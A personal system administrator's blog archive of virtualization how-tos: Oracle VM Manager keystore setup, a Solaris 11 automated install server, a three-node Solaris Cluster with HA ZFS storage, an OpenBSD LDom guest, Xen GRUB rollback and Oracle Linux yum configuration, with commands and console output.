Archive for 'Virtualization' Category








Export the keystore from OVM Manager:

# /u01/app/oracle/java/bin/keytool -keystore /u01/app/oracle/ovm-manager-3/ovmmCoreTcps.ks -exportcert -alias ovmm -file  ~/export.jks
Enter keystore password:
Certificate stored in file <export.jks>

Copy & import it into Oracle Enterprise Manager Cloud Control:
* default password: welcome

#  /u02/app/oracle/agents/agent_inst/bin/emctl secure add_trust_cert_to_jks -trust_certs_loc ./keystore/export.jks -alias ovmm
Oracle Enterprise Manager Cloud Control 12c Release 3
Copyright (c) 1996, 2013 Oracle Corporation.  All rights reserved.
Password:
 
Message   :   Certificate was added to keystore
ExitStatus: SUCCESS
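
To verify the certificate actually landed in the agent trust store, keytool can list it; the AgentTrust.jks path below and the default 'welcome' password are assumptions based on a stock 12c agent layout:

# /u01/app/oracle/java/bin/keytool -list -alias ovmm \
  -keystore /u02/app/oracle/agents/agent_inst/sysman/config/montrust/AgentTrust.jks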



Log in to the Oracle VM Manager host & generate the TCPS keystore:

[root@kandangMonyet ~]# cd /u01/app/oracle/ovm-manager-3/bin
[root@kandangMonyet bin]# ./secureOvmmTcpGenKeyStore.sh 
Generate OVMM TCP over SSH key store by following steps:
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  ozzienich
What is the name of your organizational unit?
  [Unknown]:  kandang
What is the name of your organization?
  [Unknown]:  kebonbinatang.org
What is the name of your City or Locality?
  [Unknown]:  Jakarta
What is the name of your State or Province?
  [Unknown]:  DKI
What is the two-letter country code for this unit?
  [Unknown]:  ID
Is CN=ozzienich, OU=kandang, O=kebonbinatang.org, L=Jakarta, ST=DKI, C=ID correct?
  [no]:  yes
Enter key password for <ovmm>
	(RETURN if same as keystore password):
 
[root@kandangMonyet bin]# ./secureOvmmTcp.sh
Enabling OVMM TCP over SSH service
Please enter the OVM manager user name: admin
Please enter the OVM manager user password: 
Please enter the password for TCPS key store : 
The job of enabling OVMM TCPS service is committed, please restart OVMM to take effect.

Restart the OVM Manager service:

[root@kandangMonyet bin]# /sbin/service ovmm stop
[root@kandangMonyet bin]# /sbin/service ovmm start
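
Once it is back up, it is worth confirming that the TCPS listener is live. Port 54322 is commonly the OVMM TCPS port, but treat that as an assumption and check your own install:

[root@kandangMonyet bin]# /sbin/service ovmm status
[root@kandangMonyet bin]# netstat -tlnp | grep 54322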

Register with Enterprise Manager Ops Center: create a discovery profile for the OVM.



Solaris 11 AI

  ozzie / 27/02/2014

Download the Solaris 11 AI ISO & create the install service:

# installadm create-service -s /export/home/ozzie/sol-11_1-ai-sparc.iso
Warning: Service svc:/network/dns/multicast:default is not online.
   Installation services will not be advertised via multicast DNS.
 
Creating service from: /export/home/ozzie/sol-11_1-ai-sparc.iso
OK to use subdir of /export/auto_install to store image? [y/N]: Y
Setting up the image ...
 
Creating sparc service: solaris11_1-sparc
 
Image path: /export/auto_install/solaris11_1-sparc
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
Refreshing install services
Warning: mDNS registry of service solaris11_1-sparc could not be verified.
 
Creating default-sparc alias
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
No local DHCP configuration found. This service is the default
alias for all SPARC clients. If not already in place, the following should
be added to the DHCP configuration:
Boot file: http://ip-installserver:5555/cgi-bin/wanboot-cgi
 
Refreshing install services
Warning: mDNS registry of service default-sparc could not be verified.

Generate a system configuration profile & add it to the install service:

# sysconfig create-profile -o /var/tmp/client_sc.xml


# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient
# installadm list -p
Service/Profile Name  Criteria
--------------------  --------
default-sparc
   sclient            None
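
To target the profile at particular clients, criteria can be attached afterwards, e.g. by MAC address (the MAC below is only an example):

# installadm set-criteria -n default-sparc -p sclient -c mac="00:14:4F:F8:45:94"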

 

# installadm export -n default-sparc -m orig_default -o /var/tmp/OZ.xml
# cat /var/tmp/OZ.xml
<!DOCTYPE auto_install SYSTEM "file:///usr/share/install/ai.dtd.1">
<auto_install>
  <ai_instance name="OZ">
    <target>
      <logical>
        <zpool name="rpool" is_root="true">
          <!--
            Subsequent <filesystem> entries instruct an installer to create
            following ZFS datasets:
 
                <root_pool>/export         (mounted on /export)
                <root_pool>/export/home    (mounted on /export/home)
 
            Those datasets are part of standard environment and should be
            always created.
 
            In rare cases, if there is a need to deploy an installed system
            without these datasets, either comment out or remove <filesystem>
            entries. In such scenario, it has to be also assured that
            in case of non-interactive post-install configuration, creation
            of initial user account is disabled in related system
            configuration profile. Otherwise the installed system would fail
            to boot.
          -->
          <filesystem name="export" mountpoint="/export"/>
          <filesystem name="export/home"/>
          <be name="solaris"/>
        </zpool>
      </logical>
    </target>
    <software type="IPS">
      <destination>
        <image>
          <!-- Specify locales to install -->
          <facet set="false">facet.locale.*</facet>
          <facet set="true">facet.locale.de</facet>
          <facet set="true">facet.locale.de_DE</facet>
          <facet set="true">facet.locale.en</facet>
          <facet set="true">facet.locale.en_US</facet>
          <facet set="true">facet.locale.es</facet>
          <facet set="true">facet.locale.es_ES</facet>
          <facet set="true">facet.locale.fr</facet>
          <facet set="true">facet.locale.fr_FR</facet>
          <facet set="true">facet.locale.it</facet>
          <facet set="true">facet.locale.it_IT</facet>
          <facet set="true">facet.locale.ja</facet>
          <facet set="true">facet.locale.ja_*</facet>
          <facet set="true">facet.locale.ko</facet>
          <facet set="true">facet.locale.ko_*</facet>
          <facet set="true">facet.locale.pt</facet>
          <facet set="true">facet.locale.pt_BR</facet>
          <facet set="true">facet.locale.zh</facet>
          <facet set="true">facet.locale.zh_CN</facet>
          <facet set="true">facet.locale.zh_TW</facet>
        </image>
      </destination>
      <source>
        <publisher name="solaris">
          <origin name="http://10.10.2.12:9000"/>
        </publisher>
      </source>
      <!--
        The version specified by the "entire" package below, is
        installed from the specified IPS repository.  If another build
        is required, the build number should be appended to the
        'entire' package in the following form:
 
            <name>pkg:/entire@0.5.11-0.build#</name>
      -->
      <software_data action="install">
        <name>pkg:/entire@0.5.11-0.175.1</name>
        <name>pkg:/group/system/solaris-large-server</name>
      </software_data>
    </software>
  </ai_instance>
</auto_install>
 
# installadm create-manifest -n default-sparc -f /var/tmp/OZ.xml   -m OZ -d
# installadm list -n default-sparc  -m
Service/Manifest Name  Status   Criteria
---------------------  ------   --------
default-sparc
   client2             Default  None
   orig_default        Inactive None

 

Create a local IPS repository:

# mount -F hsfs /export/repoSolaris11/sol-11-repo-full.iso /mnt 
# rsync -aP /mnt/repo/ /export/repoSolaris11 
# pkgrepo -s /export/repoSolaris11 refresh 
# svccfg -s application/pkg/server setprop pkg/inst_root=/export/repoSolaris11 
# svccfg -s application/pkg/server setprop pkg/readonly=true 
# svccfg -s application/pkg/server setprop pkg/port=9000 
# svcadm refresh application/pkg/server 
# svcadm enable application/pkg/server
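
With the depot online, clients can be pointed at it; this matches the origin the AI manifest above already references:

# pkg set-publisher -G '*' -g http://10.10.2.12:9000 solaris
# pkgrepo info -s http://10.10.2.12:9000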

 

Boot the client <:-p

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.d, 16256 MB memory available, Serial #XXXXXXXX
Ethernet address 0:21:28:3f:7a:c4, Host ID: XXXXXX
 
 
 
{0} ok setenv network-boot-arguments  host-ip=client-IP,router-ip=router-ip,subnet-mask=mask-value,hostname=client-name,file=wanbootCGI-URL
{0} ok boot net - install
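
For example, with made-up client addresses (the wanboot-cgi URL pattern follows the DHCP note above):

{0} ok setenv network-boot-arguments host-ip=10.10.2.50,router-ip=10.10.2.1,subnet-mask=255.255.255.0,hostname=sclient,file=http://10.10.2.12:5555/cgi-bin/wanboot-cgi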


Monitoring MySQL Enterprise

  ozzie / 27/06/2013

HA storage ZFS

  ozzie / 23/06/2013

A simulation of high-availability storage with a 3-node Solaris Cluster & iSCSI, on Solaris 11 & Solaris Cluster 4.1.


Once the Solaris Cluster is up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add a quorum disk device:

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored
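
The registration step itself is missing from the capture; with the Solaris Cluster 4.1 CLI it would use clquorum on the shared DID device visible from all three nodes (d2 above, which indeed appears as the quorum device in the scstat output further down):

root@Monyet1:~# clquorum add d2
root@Monyet1:~# clquorum status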

Enable automatic node reboot if all monitored disk paths fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Register the cluster storage & network resource types:

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create a resource group spanning the Monyet nodes:

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create the ZFS pool that will hold the movies – ‘poolBOKEP’ – before adding it to the cluster as a resource:

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



tambah ‘poolBOKEP’ sebagai resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE \
-p Zpools=poolBOKEP -p ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import the poolBOKEP pool created earlier:

root@Monyet1:~#  zpool import poolBOKEP

Add a virtual IP resource for resource group RG-MONYET:

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

From here it is just a matter of moving the resource group around to the other Monyets ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

or, to put it back on its most preferred node :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

All that is left is filling poolBOKEP with movies \:d/
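
For instance, a dataset for them, created on whichever node currently holds the resource group (the dataset name is just an illustration):

root@Monyet2:~# zfs create poolBOKEP/pelem
root@Monyet2:~# zfs list -r poolBOKEP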

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


Solaris Cluster

  ozzie / 21/06/2013


Download Oracle Solaris Cluster 4.1. This time the base OS is Solaris 11, with IPS.

 

Mount the source repository & refresh its IPS publisher:

# mount -F hsfs /export/home/ozzie/osc-4_1-ga-repo-full.iso  /mnt/
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg set-publisher -G "*" -g file:///mnt/repo ha-cluster
# pkg refresh
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
ha-cluster                  origin   online F file:///mnt/repo/
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg install ha-cluster-framework-full
           Packages to install:  26
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   6
 
DOWNLOAD                                PKGS         FILES    XFER (MB)   SPEED
Completed                              26/26     2794/2794    27.5/27.5    0B/s
 
PHASE                                          ITEMS
Installing new actions                     3936/3936
Updating package state database                 Done 
Updating image state                            Done 
Creating fast lookup database                   Done

Create the cluster with /usr/cluster/bin/scinstall:

 
  *** Main Menu ***
 
    Please select from one of the following (*) options:
 
      * 1) Create a new cluster or add a cluster node
        2) Upgrade this cluster node
        3) Manage a dual-partition upgrade
      * 4) Print release information for this cluster node
 
      * ?) Help with menu options
      * q) Quit
 
    Option:  1
 
 
  *** New Cluster and Cluster Node Menu ***
 
    Please select from any one of the following options:
 
        1) Create a new cluster
        2) Create just the first node of a new cluster on this machine
        3) Add this machine as a node in an existing cluster
 
        ?) Help with menu options
        q) Return to the Main Menu
 
    Option:

  >>> Cluster Name <<<
 
    Each cluster has a name assigned to it. The name can be made up of any
    characters other than whitespace. Each cluster name should be unique 
    within the namespace of your enterprise.
 
    What is the name of the cluster you want to establish?  Kandang-Monyet
 
 
  >>> Check <<<
 
    This step allows you to run cluster check to verify that certain basic
    hardware and software pre-configuration requirements have been met. If
    cluster check detects potential problems with configuring this machine
    as a cluster node, a report of violated checks is prepared and 
    available for display on the screen.
 
    Do you want to run cluster check (yes/no) [yes]?  
 
 
 
  >>> Cluster Nodes <<<
 
    This Oracle Solaris Cluster release supports a total of up to 16 
    nodes.
 
    List the names of the other nodes planned for the initial cluster 
    configuration. List one node name per line. When finished, type 
    Control-D:
 
    Node name (Control-D to finish):  Monyet1
    Node name (Control-D to finish):  Monyet2
    Node name (Control-D to finish):  Monyet3
    Node name (Control-D to finish):  ^D
 
 
 
  >>> Cluster Transport Adapters and Cables <<<
 
    Transport adapters are the adapters that attach to the private cluster
    interconnect.
 
    Select the first cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  1
 
    Searching for any unexpected network traffic on "net0" ... done
Unexpected network traffic was seen on "net0".
"net0" may be cabled to a public network.
 
    Do you want to use "net0" anyway (yes/no) [no]?  yes
 
    Select the second cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  2
 
    Searching for any unexpected network traffic on "net2" ... done
Unexpected network traffic was seen on "net2".
"net2" may be cabled to a public network.
 
    Do you want to use "net2" anyway (yes/no) [no]?  
 
 
 
  >>> Confirmation <<<
 
    Your responses indicate the following options to scinstall:
 
      scinstall -i \ 
           -C kandang-monyet \ 
           -F \ 
           -G lofi \ 
           -T node=Monyet1,node=Monyet2,authtype=sys \ 
           -w netaddr=172.16.0.0,netmask=255.255.240.0,maxnodes=32,maxprivatenets=10,numvirtualclusters=12,numxipvirtualclusters=3 \ 
           -A trtype=dlpi,name=net0 -A trtype=dlpi,name=net2 \ 
           -B type=switch,name=switch1 -B type=switch,name=switch2 \ 
           -m endpoint=:net0,endpoint=switch1 \ 
           -m endpoint=:net2,endpoint=switch2 \ 
           -P task=security,state=SECURE
 
    Are these the options you want to use (yes/no) [yes]?  
 
    Do you want to continue with this configuration step (yes/no) [yes]?  
 
 
Initializing cluster name to "kandang-monyet" ... done
Initializing authentication options ... done
Initializing configuration for adapter "net0" ... done
Initializing configuration for adapter "net2" ... done
Initializing configuration for switch "switch1" ... done
Initializing configuration for switch "switch2" ... done
Initializing configuration for cable ... done
Initializing configuration for cable ... done
Initializing private network address options ... done
 
 
Setting the node ID for "Monyet1" ... done (id=1)


Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager, with Oracle Linux 6.x as the base OS. Install the OS as usual..

Minimum spec prerequisites for OVM (a quick check follows the list):

  • Memory: 1.5 GB (4 GB when using Oracle Database XE)
  • Processor: 64-bit
  • Swap: > 2.1 GB
  • Disk space: 5 GB for /u01 and 2 GB for /tmp
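
A quick way to sanity-check those numbers on the freshly installed box, with thresholds per the list above:

# grep MemTotal /proc/meminfo   # >= 1.5 GB (4 GB with Database XE)
# uname -m                      # expect x86_64
# swapon -s                     # total > 2.1 GB
# df -h /u01 /tmp               # 5 GB for /u01, 2 GB for /tmp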

 

All sources can be downloaded from: https://edelivery.oracle.com/
To update Oracle Linux packages via yum, see the earlier post on it.

Below is the list of ports required for OVM – OVS – Client communication:



Oracle Enterprise Cloud Infrastructure

  ozzie / 23/04/2013

Exploring & building cloud & Solaris virtualization (LDoms & Zones).



Just a review: Oracle Enterprise Manager Ops Center. All the features are there; monitoring, provisioning, managing, maintaining.. even developing, with deployment plans already included… migrating zones & VMs.. server & storage pools..


Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c





Install OpenBSD in a Solaris LDom on a Sun Enterprise T5220 machine.
Create the guest at the domain controller: with just 8 CPUs, 4 GB RAM & 2 network interfaces :p

# ldm add-domain OpenBSD
# ldm add-vcpu 8 OpenBSD
# ldm add-memory 4G OpenBSD 
# ldm add-vnet vnet1 primary-vsw0 OpenBSD
# ldm add-vnet vnet2 primary-vsw1 OpenBSD

Create ZFS volumes for the disks:

# zfs create Ldom/OpenBSD
# zfs create -V 40gb Ldom/OpenBSD/disk0
# zfs create -V 80gb Ldom/OpenBSD/disk1


# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk0  openbsd-disk0@primary-vds0
# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk1  openbsd-disk1@primary-vds0
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm add-vdisk vdisk2 openbsd-disk1@primary-vds0 OpenBSD
# ldm bind OpenBSD
# ldm set-var auto-boot\?=false OpenBSD
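
Before attaching the installer, the binding can be double-checked:

# ldm list OpenBSD
# ldm list-bindings OpenBSD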

Download the OpenBSD ISO for the sparc64 architecture & attach it to the domain:

# wget ftp://ftp.openbsd.org/pub/OpenBSD/5.2/sparc64/install52.iso
# ldm add-vdsdev /export/home/ozzie/install52.iso iso@primary-vds0
# ldm add-vdisk cdrom iso@primary-vds0 OpenBSD



At this point a virtual device (cdrom) holding the OpenBSD installer has been created.

Activate the guest domain & install OpenBSD as usual..

# ldm start-domain OpenBSD
# telnet localhost 50xx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
 
Connecting to console "OpenBSD" in group "OpenBSD" ....
Press ~? for control options ..
 
{0} ok 
{0} ok 
{0} ok devalias
cdrom                    /virtual-devices@100/channel-devices@200/disk@1
vdisk1                   /virtual-devices@100/channel-devices@200/disk@0
...
...
...
 
Boot device: /virtual-devices@100/channel-devices@200/disk@1:f  File and args: 
OpenBSD IEEE 1275 Bootblock 1.3
..>> OpenBSD BOOT 1.4
Trying bsd...
Booting /virtual-devices@100/channel-devices@200/disk@0:a/bsd
6605424@0x1000000+5520@0x164ca70+173400@0x1800000+4020904@0x182a558 
symbols @ 0xfedd02c0 81+405456+255993 start=0x1000000
[ using 662248 bytes of bsd ELF symbol table ]
console is /virtual-devices@100/console@1
Copyright (c) 1982, 1986, 1989, 1991, 1993
	The Regents of the University of California.  All rights reserved.
Copyright (c) 1995-2012 OpenBSD. All rights reserved.  http://www.OpenBSD.org
 
OpenBSD 5.2 (GENERIC.MP) #236: Mon Jul 30 16:38:18 MDT 2012
    deraadt@sparc64.openbsd.org:/usr/src/sys/arch/sparc64/compile/GENERIC.MP
real mem = 4294967296 (4096MB)
avail mem = 4210024448 (4014MB)
mainbus0 at root: SPARC Enterprise T5220
cpu0 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu1 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu2 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu3 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu4 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu5 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu6 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu7 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
vbus0 at mainbus0
"flashprom" at vbus0 not configured
"n2cp" at vbus0 not configured
"ncp" at vbus0 not configured
vrng0 at vbus0
vcons0 at vbus0: ivec 0x111, console
cbus0 at vbus0
vnet0 at cbus0 chan 0x0: ivec 0x200, 0x201, address 00:14:4f:f8:45:94
vnet1 at cbus0 chan 0x3: ivec 0x206, 0x207, address 00:14:4f:fa:c4:73
vdsk0 at cbus0 chan 0x6: ivec 0x20c, 0x20d
scsibus0 at vdsk0: 2 targets
sd0 at scsibus0 targ 0 lun 0: <SUN, Virtual Disk, 1.0> SCSI3 0/direct fixed
sd0: 40960MB, 512 bytes/sector, 83886080 sectors
"virtual-domain-service" at cbus0 not configured
vrtc0 at vbus0
vscsi0 at root
..
..
..
..

Install as usual, and tidy up once finished:

# ldm set-var auto-boot\?=true OpenBSD
# ldm stop OpenBSD
LDom OpenBSD stopped
# ldm remove-vdisk cdrom OpenBSD 
# ldm remove-vdsdev iso@primary-vds0

Hope this is useful… :p



Update Grub VM @ Xen

  ozzie / 17/02/2013

When a VM inside XEN upgrades its system, some OS kernels are updated to the latest version, and those ‘some’ can no longer boot, producing this error:

Traceback (most recent call last): - File "/usr/bin/pygrub", line 746, in ? - raise RuntimeError,
 "Unable to find partition containing kernel" - RuntimeError: Unable to find partition containing kernel

To roll back, update the GRUB loader to the previous kernel by editing the GRUB configuration:

# xe vm-list 
uuid ( RO)           : 64c5468e-e104-80c0-5715-ad90bd6c0d26
     name-label ( RW): OL-1
...
...
# xe-edit-bootloader -u 64c5468e-e104-80c0-5715-ad90bd6c0d26  -p1
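
Inside the editor, pointing the default entry at the previous (still working) kernel is usually enough; the relevant grub.conf line looks like this (entry numbers depend on your menu):

default=1    # 0 = the newly installed kernel that fails, 1 = the previous working entry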

Hope this is useful :D



Managing Solaris Zone

  ozzie / 14/02/2013

upgrade Oracle Linux 6.x

  ozzie / 27/12/2012
# cd /etc/yum.repos.d/
# wget http://public-yum.oracle.com/public-yum-ol6.repo
--2012-12-27 00:07:14--  http://public-yum.oracle.com/public-yum-ol6.repo
Resolving public-yum.oracle.com... 141.146.44.34
Connecting to public-yum.oracle.com|141.146.44.34|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2201 (2.1K) [text/plain]
Saving to: “public-yum-ol6.repo”
 
100%[================================================================>] 2,201       --.-K/s   in 0s      
 
2012-12-27 00:07:20 (200 MB/s) - “public-yum-ol6.repo” saved [2201/2201]


# more public-yum-ol6.repo 
[ol6_latest]
name=Oracle Linux $releasever Latest ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/latest/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=1
 
[ol6_addons]
name=Oracle Linux $releasever Add ons ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/addons/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_ga_base]
name=Oracle Linux $releasever GA installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/0/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_u1_base]
name=Oracle Linux $releasever Update 1 installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/1/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_u2_base]
name=Oracle Linux $releasever Update 2 installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/2/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_u3_base]
